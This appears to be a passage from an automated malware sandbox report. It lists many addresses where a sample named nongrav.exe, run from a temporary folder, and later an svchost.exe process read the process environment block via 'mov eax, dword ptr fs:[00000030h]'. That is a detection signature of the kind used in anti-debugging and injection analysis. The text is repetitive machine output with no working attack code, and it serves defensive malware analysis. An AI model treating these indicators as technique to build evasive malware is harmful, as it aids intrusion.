Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB47794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB7D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD8794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB037F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB453CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB453CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB9070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB9070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEF716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADFF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB98F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB98B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADEF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB090AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB43884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB43884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB814FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB98CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB47016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB47016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB47016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB94015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB94015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB9740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB9740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB9740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB82073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB91074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB469A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB905AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB905AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB78DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB541E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB4A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB98D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB03D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB43540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A31B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A31B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ADD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA7794 mov eax, dword ptr fs:[00000030h]
